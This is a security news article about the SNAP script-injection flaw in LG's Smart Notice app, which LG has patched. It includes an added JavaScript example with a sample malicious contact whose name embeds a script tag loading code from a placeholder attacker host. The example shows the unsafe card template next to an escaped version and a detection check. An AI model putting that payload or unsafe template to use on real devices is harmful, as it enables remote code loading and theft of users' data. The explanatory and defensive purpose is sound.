LG today released a security update for some of its latest smartphones to resolve a severe vulnerability found in the Smart Notice application.
Introduced by LG in 2014, along with the flagship LG G3, the Smart Notice application comes pre-loaded on all new LG smartphones, and was designed to display notifications to users. BugSec security researchers Liran Segal and Shachar Korot discovered that the notifications displayed by Smart Notice can be modified to inject unauthenticated arbitrary JavaScript code on the affected devices.
Called SNAP, the vulnerability can result in the theft of sensitive user data, a team of BugSec and Cynet researchers determined. Furthermore, with Smart Notice loaded on all new LG handsets, they suggest that the flaw potentially affects millions of users globally.
By exploiting the vulnerability, attackers can extract private user information from the device, such as what’s stored on the SD card, including WhatsApp data and private images. Moreover, successful exploitation renders users vulnerable to phishing attacks and can result in the installation of mobile malware on the affected devices.
Smart Notice was designed to present users with a series of notifications in the form of cards: suggestions to keep in touch with favorite contacts or to save a caller’s number, reminders of contact birthdays, and reminders to call back a contact after a declined call.
The issue is that the Smart Notice application does not validate or sanitize the data it presents to users, which means that contact data taken from the phone’s address book can be manipulated to carry an attacker’s payload. The team of researchers also discovered that functionality issues in the application make it possible to launch attacks using several different methods.
The security researchers managed to insert a new “malicious” contact, with a script embedded in its fields, into the contacts list and have it triggered by the “Callback Reminder” and “Birthday notification” cards. Smart Notice renders its cards in a “WebView”, and the researchers said they were able to run code from the “WebView” context against the phone itself.
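The injection pattern described above comes down to a card template that concatenates contact fields straight into the HTML a WebView parses. The following is an added example, not LG’s code and not the researchers’ proof of concept: a constructed contact record whose display name carries a script tag, the vulnerable rendering alongside an escaped rendering, and a check that flags cards still containing contact-supplied markup. The contact names, numbers and the attacker hostname are made up for illustration. How script running inside the page then reaches the device depends on which native bridges the host app exposes (for example objects registered with the platform’s addJavascriptInterface); the article does not say what Smart Notice exposed, and this example stops at the HTML boundary.

```javascript
// Added example (not LG's or BugSec's code): a notification card built from
// unsanitized contact data as a script-injection sink, and the hardened form.

// Constructed sample contacts. The malicious one mirrors the idea of a
// crafted address-book entry: the display name contains a <script> tag that
// would load a remote payload once rendered as HTML.
const MALICIOUS_CONTACT = {
  name: 'Alice <script src="https://attacker.example/snap.js"></script>',
  number: "+1 555 0100",
};

const BENIGN_CONTACT = { name: "Bob O'Neil", number: "+1 555 0101" };

// Vulnerable pattern: the card template drops contact.name straight into the
// HTML string. The WebView parses whatever the name contains as markup, so a
// <script> element in a contact name becomes live script when the card shows.
function renderCallbackCardUnsafe(contact) {
  return `<div class="card">Call back ${contact.name} (${contact.number})</div>`;
}

// Minimal HTML escaping for text placed in element content. These five
// characters are the ones that can change the parsing context there.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => ({
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#39;",
  })[ch]);
}

// Hardened pattern: same template, but every contact-supplied field is escaped
// before it reaches the HTML. Both the name and the number are untrusted; a
// caller-ID string is attacker-controlled just as much as a stored name.
function renderCallbackCardSafe(contact) {
  return `<div class="card">Call back ${escapeHtml(contact.name)} (${escapeHtml(contact.number)})</div>`;
}

// Check for a rendered card: strip the template's own <div> tags, then flag any
// remaining tag-like sequence, which can only have come from contact data.
function containsInjectedTag(html) {
  const stripped = html.replace(/<\/?div\b[^>]*>/g, "");
  return /<[a-zA-Z!/]/.test(stripped);
}

// Stand-alone demonstration.
if (typeof require !== "undefined" && require.main === module) {
  for (const contact of [MALICIOUS_CONTACT, BENIGN_CONTACT]) {
    const unsafe = renderCallbackCardUnsafe(contact);
    const safe = renderCallbackCardSafe(contact);
    console.log("unsafe:", unsafe, "-> injected tag:", containsInjectedTag(unsafe));
    console.log("safe:  ", safe, "-> injected tag:", containsInjectedTag(safe));
  }
}
```

Escaping is the string-building fix; in real WebView page code the equivalent is to create the card’s text nodes with `textContent` rather than assigning contact data through `innerHTML`. The check function is a last-line regression test for a template, not a substitute for escaping: it only tells you that a given rendered card still contains markup that the template itself did not put there.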
By loading external scripts from a remote host and refreshing the code every few seconds, researchers gained control over the LG phone and were able to send additional payloads. The flaw allowed the researchers to access a phone’s external SD Card, auto open the browser to a remote site (for phishing and/or drive-by downloads), and even launch a denial of service (DoS) attack.
The researchers also found that attackers could use several vectors to compromise a device by injecting the malicious contact without the phone user noticing it.
The researchers have contacted LG to report the vulnerability and the company was quick to acknowledge the issue and deliver a patch. Owners of LG devices that have the Smart Notice loaded on them are advised to update to the latest version of the application as soon as possible to stay protected.
Vulnerabilities in mobile devices are nothing out of the ordinary, especially when it comes to Android, as Google patches flaws in the OS on a monthly basis.